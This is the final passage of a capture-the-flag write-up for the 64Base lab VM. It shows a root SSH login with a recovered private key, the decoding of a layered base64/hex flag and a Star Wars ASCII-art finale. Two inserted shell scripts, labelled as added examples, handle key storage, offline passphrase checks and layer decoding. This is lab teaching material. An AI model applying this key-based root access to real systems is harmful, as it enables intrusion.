eric@geoda:/tmp$ ssh root@192.168.56.103 -p 62964 -i ~/.ssh/authorized_keys Enter passphrase for key '/home/eric/.ssh/authorized_keys': Last login: Tue Apr 25 18:38:02 2017 from 192.168.56.1 flag6{NGU1NDZiMzI1YTQ0NTEzMjRlMzI0NTMxNTk1NDU1MzA0ZTU0NmI3YTRkNDQ1MTM1NGU0NDRkN2E0ZDU0NWE2OTRlNDQ2YjMwNGQ3YTRkMzU0ZDdhNDkzMTRmNTQ1NTM0NGU0NDZiMzM0ZTZhNTk3OTRlNDQ2MzdhNGY1NDVhNjg0ZTU0NmIzMTRlN2E2MzMzNGU3YTU5MzA1OTdhNWE2YjRlN2E2NzdhNGQ1NDU5Nzg0ZDdhNDkzMTRlNmE0ZDM0NGU2YTQ5MzA0ZTdhNTUzMjRlMzI0NTMyNGQ3YTYzMzU0ZDdhNTUzMzRmNTQ1NjY4NGU1NDYzMzA0ZTZhNjM3YTRlNDQ0ZDMyNGU3YTRlNmI0ZDMyNTE3NzU5NTE2ZjNkMGEK} root@64base:~#
Success! And there's flag6!
flag6{NGU1NDZiMzI1YTQ0NTEzMjRlMzI0NTMxNTk1NDU1MzA0ZTU0NmI3YTRkNDQ1MTM1NGU0NDRkN2E0ZDU0NWE2OTRlNDQ2YjMwNGQ3YTRkMzU0ZDdhNDkzMTRmNTQ1NTM0NGU0NDZiMzM0ZTZhNTk3OTRlNDQ2MzdhNGY1NDVhNjg0ZTU0NmIzMTRlN2E2MzMzNGU3YTU5MzA1OTdhNWE2YjRlN2E2NzdhNGQ1NDU5Nzg0ZDdhNDkzMTRlNmE0ZDM0NGU2YTQ5MzA0ZTdhNTUzMjRlMzI0NTMyNGQ3YTYzMzU0ZDdhNTUzMzRmNTQ1NjY4NGU1NDYzMzA0ZTZhNjM3YTRlNDQ0ZDMyNGU3YTRlNmI0ZDMyNTE3NzU5NTE2ZjNkMGEK}
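Two practitioner notes on the key handling above, shown as an added example rather than the write-up's own commands. First, `ssh -i` accepts any path, so a recovered key is better kept in its own file than written over `~/.ssh/authorized_keys` (that file lists public keys allowed to log in and never holds a private key). Second, the `Proc-Type: 4,ENCRYPTED` and `DEK-Info` headers announce up front that the PEM is passphrase-protected; once the key cannot be unlocked at the passphrase prompt, ssh simply moves on to password authentication, which is what the three failed prompts in the first attempt were. The PEM body below is a placeholder, not the VM's key, and the `verify_passphrase` helper assumes `ssh-keygen` is installed.

```shell
#!/bin/sh
# Added example, not from the original write-up: store a recovered PEM
# private key with safe permissions and check, before touching the target,
# whether it needs a passphrase and which cipher protects it.

# Constructed sample: only the headers from the write-up are real; the body
# is a placeholder string, so this is NOT a usable key.
SAMPLE_PEM='-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,621A38AAD4E9FAA3657CA3888D9B356C

cGxhY2Vob2xkZXIga2V5IGJvZHk=
-----END RSA PRIVATE KEY-----'

# save_key PEM PATH: refuse anything that is not a PEM private key, then
# create the file under umask 077 so it is never world-readable, not even
# for the instant before a chmod. Returns non-zero on failure.
save_key() {
    pem=$1
    path=$2
    printf '%s\n' "$pem" | grep -q -- '^-----BEGIN .*PRIVATE KEY-----$' || {
        echo "save_key: input does not look like a PEM private key" >&2
        return 1
    }
    (umask 077 && printf '%s\n' "$pem" > "$path") || return 1
    chmod 600 "$path"
}

# key_needs_passphrase PATH: 0 if the legacy PEM carries the
# "Proc-Type: 4,ENCRYPTED" header, i.e. ssh will ask for a passphrase.
key_needs_passphrase() {
    grep -q '^Proc-Type: 4,ENCRYPTED' "$1"
}

# key_cipher PATH: print the DEK-Info cipher, e.g. AES-128-CBC, or nothing
# for an unencrypted key.
key_cipher() {
    sed -n 's/^DEK-Info: *\([^,]*\),.*/\1/p' "$1"
}

# verify_passphrase PATH PASSPHRASE: 0 if ssh-keygen can unlock the key with
# that passphrase, so a guess like "usetheforce" can be tested offline
# instead of against the target. Assumes ssh-keygen is on PATH; note the
# passphrase is visible in the process list while this runs.
verify_passphrase() {
    ssh-keygen -y -P "$2" -f "$1" >/dev/null 2>&1
}

# Usage with the placeholder key (real key material would go in SAMPLE_PEM):
KEYFILE=${KEYFILE:-./64base_root}
if save_key "$SAMPLE_PEM" "$KEYFILE"; then
    if key_needs_passphrase "$KEYFILE"; then
        echo "$KEYFILE is passphrase-protected ($(key_cipher "$KEYFILE"))"
    else
        echo "$KEYFILE is not passphrase-protected"
    fi
fi
```

With the real key in place the login becomes `ssh -o IdentitiesOnly=yes -i ~/.ssh/64base_root -p 62964 root@192.168.56.103`; `IdentitiesOnly=yes` keeps ssh from offering every other identity in the agent first, which on a host with a low `MaxAuthTries` would otherwise lock you out before the right key is tried.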
The Finale
I try to decode the flag but realize it has been run through several alternating layers of base64 and hex encoding. I run base64 -d and xxd -r -p in turn until I get the original message:
root@64base:~# echo "NGU1NDZiMzI1YTQ0NTEzMjRlMzI0NTMxNTk1NDU1MzA0ZTU0NmI3YTRkNDQ1MTM1NGU0NDRkN2E0ZDU0NWE2OTRlNDQ2YjMwNGQ3YTRkMzU0ZDdhNDkzMTRmNTQ1NTM0NGU0NDZiMzM0ZTZhNTk3OTRlNDQ2MzdhNGY1NDVhNjg0ZTU0NmIzMTRlN2E2MzMzNGU3YTU5MzA1OTdhNWE2YjRlN2E2NzdhNGQ1NDU5Nzg0ZDdhNDkzMTRlNmE0ZDM0NGU2YTQ5MzA0ZTdhNTUzMjRlMzI0NTMyNGQ3YTYzMzU0ZDdhNTUzMzRmNTQ1NjY4NGU1NDYzMzA0ZTZhNjM3YTRlNDQ0ZDMyNGU3YTRlNmI0ZDMyNTE3NzU5NTE2ZjNkMGEK" | base64 -d | xxd -r -p | base64 -d | xxd -r -p | base64 -d base64 -d /var/local/.luke|less.real root@64base:~#
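The manual chain above works once you already know the layer order. As an added example that is not part of the original write-up, here is a small POSIX shell script that detects each layer and peels it off automatically; the same script handles the earlier hex -> base64 -> PEM decode of the private key, since it stops as soon as a layer is no longer hex or base64. `xxd` is swapped for a portable `od`/`printf` pair so it runs on a box without vim-common, and the sample input is constructed by wrapping the final hint the same way flag6 was, not copied from the VM.

```shell
#!/bin/sh
# Added example, not from the original write-up: peel alternating hex and
# base64 layers automatically instead of chaining "base64 -d | xxd -r -p"
# by hand and eyeballing every intermediate result.

hex_encode() { od -An -v -t x1 | tr -d ' \n'; }
b64_encode() { base64 | tr -d '\n'; }

# hex_decode: stdin hex digits -> raw bytes, two digits per byte. printf
# understands octal escapes in every shell, so each byte goes through %o.
hex_decode() {
    tr -d ' \t\r\n' | fold -w 2 | while read -r pair || [ -n "$pair" ]; do
        [ -n "$pair" ] && printf "\\$(printf '%03o' "$((0x$pair))")"
    done
}

# layer_kind DATA: print "hex", "base64" or "plain" for one layer of text.
# Hex is tested first because a hex string is also valid base64 alphabet.
layer_kind() {
    compact=$(printf '%s' "$1" | tr -d ' \t\r\n')
    if printf '%s' "$compact" | grep -Eq '^([0-9a-fA-F]{2})+$'; then
        echo hex
    elif [ $(( ${#compact} % 4 )) -eq 0 ] &&
         printf '%s' "$compact" | grep -Eq '^[A-Za-z0-9+/]+={0,2}$'; then
        echo base64
    else
        echo plain
    fi
}

# decode_layer KIND DATA: decode one layer to stdout as raw bytes.
decode_layer() {
    compact=$(printf '%s' "$2" | tr -d ' \t\r\n')
    case $1 in
        hex)    printf '%s' "$compact" | hex_decode ;;
        base64) printf '%s' "$compact" | base64 -d ;;
    esac
}

# peel DATA: print the innermost text layer on stdout and the chain of
# layers removed on stderr. Stops at plaintext, or just before a layer that
# decodes to non-printable bytes (a binary payload such as a raw key or
# image), which is left intact for the caller to decode into a file.
peel() {
    data=$1
    depth=0
    while :; do
        kind=$(layer_kind "$data")
        [ "$kind" = plain ] && break
        # bytes outside printable ASCII after decoding mean a binary payload
        junk=$(decode_layer "$kind" "$data" 2>/dev/null |
               LC_ALL=C tr -d '[:print:][:space:]' | wc -c)
        if [ "$((junk + 0))" -gt 0 ]; then
            echo "layer $((depth + 1)): $kind hides binary data, stopping" >&2
            break
        fi
        next=$(decode_layer "$kind" "$data" 2>/dev/null) || break
        depth=$((depth + 1))
        echo "layer $depth: $kind removed, ${#next} bytes remain" >&2
        data=$next
    done
    printf '%s\n' "$data"
}

# wrap_like_flag6 MSG: constructed sample builder applying the same chain
# flag6 used, base64(hex(base64(hex(base64(msg))))).
wrap_like_flag6() {
    printf '%s\n' "$1" | b64_encode | hex_encode | b64_encode | hex_encode | b64_encode
}

SAMPLE=$(wrap_like_flag6 'base64 -d /var/local/.luke|less.real')
peel "$SAMPLE"
```

To use it on the real flag, pass the text between `flag6{` and `}` as the argument to `peel`; the stderr trace shows the five layers coming off and stdout ends with the `base64 -d /var/local/.luke|less.real` hint. The hex-first rule is a heuristic: a short base64 string made only of the characters 0-9 and a-f would be misread as hex, which is why the script reports each layer rather than decoding silently.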
It says "base64 -d /var/local/.luke|less.real". I of course do as it says and I'm presented with the finale!
\ \ / / | | | | __ \ \ \ /\ / /__| | | | | | | ___ _ __ ___ \ \/ \/ / _ \ | | | | | |/ _ \| '_ \ / _ \ \ /\ / __/ | | | |__| | (_) | | | | __/ __ \/ _\/ \___|_|_|_|_____/ \___/|_|_|_|\___| _ \ \ / / | __ \(_) | | |_ _| | | | \ \_/ /__ _ _ | | | |_ __| | | | | |_| | \ / _ \| | | | | | | | |/ _` | | | | __| | | | (_) | |_| | | |__| | | (_| | _| |_| |_|_| |_|\___/ \__,_| |_____/|_|\__,_| |_____|\__(_) _____ _ _ _ __ __ __ _ ___ _ __ ___ __ __ __ _ ___ _ _ __ _________ %=x%= | |V| |_)|_ |_) | |_| | |_) |_| (_ |_ |_) | |_| |\| (_ %=x%=x%=x ~~~~~ | | | | |_ | \ | | | |_ |_) | | __) |_ | |_ | | | | __) ~~~~~~~~~ LS .-. .-. .=========. E x t e r i o r , A e r i a l V i e w ||.-.7.-.|| ----------------------------------------- ||`-' `-'|| `=========' `-'| |`-'8 1 .............. Sensor Suite Tower ______ |9| ______ 2 ... Heavy Twin Turbolaser Turrets / /\__| |__/\ \ 3 ............. Heavy Laser Turrets / \_ / / |_| \ \ _/ \ 4 ....... TIE Fighter Launch Chutes /___(\\\/ \///)___\ 5 ............... Heavy Blast Doors \____\\`==========='//____/ 6 .................... Guard towers / '/ .-------. \\ \ 7 ........ Shuttle Landing Platform __/ //. \`+---+'/ .\\ \__ 8 ........... AT-AT Docking Station /\ \ ///x`.\|___|/.'x\\\ / /\ 9 ................. Connecting Ramp / \ \ //`-._//| |\\_.2'\\ / / \ / _.-==='_____//.-=-.\\_____`===-._ \ \ `-===.\-. \ `-=1' / .-/.===-' 3 / The pre-fabricated, multi-function \ / / \\\ \ \.===./ /4/// \ \ / Imperial garrison base is the back- \/_/ \\\ | /.---.\ | /// \_\/ bone of the Empire's occupational \ \\\|/ |_m_| \|/// / forces. These heavily-armoured for- \_____\=============/_____/ tresses have walls up to 10 meters /____/// ___ \\\____\ thick to guard against ground \ (_//\__|||||__/\\_) / assaults, and powerful deflector \ / \|,,|||||,,|/ \ / shields protect them for air or \_____| | 5 | 6|_____/ space attacks. 
`--' `--' ____________________________________________________________________________ %=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x% ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ U E x t e r i o r , S i d e V i e w /_\ ------------------------------------- 1 [___] :`:': 1 .............. Sensor Suite Tower `:::' 2 ... Heavy Twin Turbolaser Turrets _ :_: _ 3 ............. Heavy Laser Turrets =[ ]2 [%] [ ]= 4 ....... Tie Fighter Launch Chutes :=: :=: :=: 5 ............... Heavy Blast Doors _|_|_ __| |__ _|_|_ 6 .................... Guard Towers / /XX|\ /__|_|__\ /|XX\ \ 3 /4/XXX| | _/___\_ | |XXX\ \ 7 ....... AT-AT Walker --===____/--===X|_|/_______\|_|X===--\____===-- 8 ........ AT-ST Scout /__| | /l_\\ //_|\ |_|__\ /~~.' | /:' \\ _____ // `:\ | `. \ / | .' / | \\==|||||==// | \ `. | \ 7 8 / .' | / .' | ||5|| 6| `. \ | `. \ xx= _ /____|__|__/__|______l__|||||__l______|__\__|__|____\ ll <~ ____________________________________________________________________________ %=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x% ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ O u t e r D e f e n s e s | | --------------------------- ^_[]_^ ^_[]_^ |----| 5 |----| 1 ... High Voltage Death Fence ________`-..-'________4________`-..-'______ 2 ....... Perimeter Gate House =========================================== 3 ........ Powered Force Field `||' `||' 4 .......... Fortified Catwalk || ^==^ ^==^ || 5 ......... Observattion tower ___.____._ll_._1_|--| |--|___._ll_.____.____ XXX|XXXX|XIIX|XXX|--| 3 |--|XXX|XIIX|XXXX|XXXX XXX|XXXX|XIIX|XXX| 2| | |XXX|XIIX|XXXX|XXXX The outer perimeter is marked by a high-voltage "death fence." Powered Force fields placed at regular intervals along the fence may be turned off to permit entry and exit. Observation towers, connected by fortified cat- walks, are set back from the fence and constantly manned by stormtroopers. 
Other outer defenses include energy mine fields, modified patrol Droids, and AT-ST Scout Walkers. ____________________________________________________________________________ %=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x% ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ _ /| L a n d i n g P l a t f o r m -==+ ------------------------------- : [__________] Up to two Lambda-class shuttles and four `' || ||`-' AT-AT Walkers can dock at the platform. ======== =xx A loading ramp leads directly from the || || ll platform into the garrison complex. ~~~~~~~~~~~~~~~~~~~~~~ ____________________________________________________________________________ %=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x% ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ I n t e r i o r , L e v e l s 1 - 5 --------------------------------------- ______ ______ The first 5 levels of the garrison com- / ____ \_______/ ____ \ plex are of identical layout, construc- / / \_________/ \ \ ted around a level-spanning surface / / | 3 | 5 \ \ vehicle bay. Refer to the key below to \ \ \_____/_______/ / determine what each level contains. / / o |o o| o \ \ __/ / 2 .' o4o `. 6 \ \__ 1 ... Storage Gallery (levels 1-2), / __/ .' ._o_o_. `. \__ \ Armory (levels 3-4), Training / / `-. .' .' 10 `. `. .-' \ \ Facilities and Recreation / / ~' .'`-._____.-'`. `~ \ \ Rooms (level 5) \ \ o < C | | | D > o 7 / / 2 ... Stormtrooper Barracks (levels \ \__ \ ' ' ' / __/ / 1-3), Security Barracks \__ \ 1 |---- 9 ----|~-._ / __/ (levels 4-5) \ \ |==== B====| Y / 3 ...... Base Security (levels 1-5) \ \ |---- ----| / / 4 ......... Turbolifts (levels 1-6) / / |__A_ _ __| 8 \ \ 5 .... Detention Block (levels 1-5) \ \ | | | | / / 6 ... Technical and Service Person- \ \_____| | | |_____/ / nel Barracks (levels 1-5) \_____ `o| |o' _____/ 7 ... 
Technical Shops (levels 1-2), `--' `--' Medical Bay (level 3), Science Labs (levels 4-5) 8 ... Storage Gallery (levels 1-2), Droid Shops (levels 3-5) 9 ...................... Surface Vehicle Bay (levels 1-5): A .................................. AT-ST Scout Walker Bays B ........................................ AT-AT Walker Bays C ...................... Vehicle Maintenance and Repair Deck D ........................................ Speeder Bike Deck 10 ........................... Miscellaneous Vehicle Parking ____________________________________________________________________________ %=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x% ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ I n t e r i o r , L e v e l 6 --------------------------------- ____ ____ / __ \_________/ __ \ Base command personnel, control rooms, / / \___________/ \ \ rooms, trade mission, and diplomatic \ \ o oo o / / offices are located on this level. / / oo----. \ \ / / 8 __oo `.1 \ \ 1 ....... Sensor Monitors, Tractor Beam __/ /\ .~ || 2 \ \ \__ and Shield Controls / __/ \ .' 9.-'`-. | /\__ \ 2 ....................... Computer Room / / o \|__: o :_____|/ o \ \ 3 ....................... Meeting Rooms \ \__ 7 .---: 10 :------.3 __/ / 4 ...... Officers' and Pilots' Quarters \__ \ / `-..-' \/ __/ 5 ... Trade Mission, Diplomatic Offices \ \/\ 5 || / / 6 ........... Base Commander's Quarters \ \ `. || 4 / / and offices \ \ o~`---|| o / / 7 ............ Officer Recreation Rooms / /6 ____||_____ \ \ 8 ............................. Offices \ \__/ _________ \__/ / 9 ................... Base Control Room \____/ \____/ 10 ..................... 
Reception Area ____________________________________________________________________________ %=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x% ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ I n t e r i o r , L e v e l 7 --------------------------------- __ __ /_]\ /[_\ The TIE Fighter Hanger Deck houses the \ \,===========./ / garrison's TIE fighters in standard-design //:o-----------o:\\ ceiling racks. Bases are usually equipped /// X X X X X X \\\ with 30 TIE fighters and five TIE bombers /// X X X_X_X X X \\\ (a single bomber takes up the same rack __/// X X [___] X X \\\__ space as two fighters). Five to 15 ships /\_/o X X 1 &/3\& X X o\_/\ are on constant patrol, depending on the \]_\\ X X <\\_//> //_[/ base's readiness level. \\\ X X \>&</2 X []/// \\\ X X [] X []/// 1 .............. TIE Fighter Ceiling Racks \\\ X [] [] /// (holds up to 40 craft) \\:o-----------o:// 2 ............. Lift Platforms, to Level 8 /_/`==========='\_\ 3 .................. Flight Control Center \_]/ \[_/ X ............................ TIE Fighter [] ............................ TIE Bomber ____________________________________________________________________________ %=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x% ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ I n t e r i o r , L e v e l 8 --------------------------------- (not shown) The Flight Deck contains the tractor beam generators which catapult out- going craft into the open sky and reel in landing ships. Pilots relinquish control of their ships during take off and landing because of the limited maneuvering area within the chutes. 
____________________________________________________________________________ %=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x% ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ S u b - L e v e l I n s t a l l a t i o n s --------------------------------------------- (not shown) A large underground section of the base houses the main power and back-up generators, the tractor beam and deflector shield generators, the environ- ment control station, and the waste disposal and refuse units. Some storage facilities are also located here. ____________________________________________________________________________ %=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x% ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Version 1.9 (released 941211). Pictures by Lennert Stock (LS), Rowan Crawford (-Row), Ray Brunner, Bob VanderClay and Joe Rumsey. The pictures work best when shown on a white on black screen (except for some faces) with a not too fancy font. Contribu- tions welcome, email to the adress below. Sources LS: The Star Wars Source- book, Star Wars Imperial Sourcebook, The Star Wars Rebel Alliance Source- book, Star Wars: The Roleplaying Game (2nd Ed) all by West End Games, Inc. ____________________________________________________________________________ ______ ______ ______ ______ ______ ______ ______ ______ |______||______||______||______||______||______||______||______||______| _ _ ____ __ __ __ __ ____ _ _ _ _____ ______ | \ | | / __ \\ \ / / \ \ / // __ \ | | | |( )| __ \ | ____| | \| || | | |\ \ /\ / / \ \_/ /| | | || | | ||/ | |__) || |__ | . 
` || | | | \ \/ \/ / \ / | | | || | | | | _ / | __| | |\ || |__| | \ /\ / | | | |__| || |__| | | | \ \ | |____ |_| \_| \____/ \/ \/ |_| \____/ \____/ |_| \_\|______| _ ______ _____ _____ _ /\ | || ____|| __ \|_ _|| | / \ | || |__ | | | | | | | | / /\ \ _ | || __| | | | | | | | | / ____ \ | |__| || |____ | |__| |_| |_ |_| /_/ \_\ \____/ |______||_____/|_____|(_) ______ ______ ______ ______ ______ ______ ______ ______ ______ |______||______||______||______||______||______||______||______||______| I hope you enjoyed this challenge Please leave comments & feedback @ https://www.vulnhub.com/?q=64base ----------------------------------- 64Base Challenge by 3mrgnc3 @ https://3mrgnc3.ninja -----------------------------------
Holy cow! This was an awesome VM to work with. There were a ton of tools and tricks that I either hadn't used in forever or got to learn. I really loved the Star Wars theme and the ASCII art. This VM had plenty of rabbit holes to get lost in but had the perfect amount of *hints* to keep you on track.
I'd like to thank @3mrgnc3 for creating such a fun VM and of course g0tmi1k and vulnhub for hosting these wonderful images. Also, I'd like to thank some of my buddies that worked on this with me.
Until next time!
geoda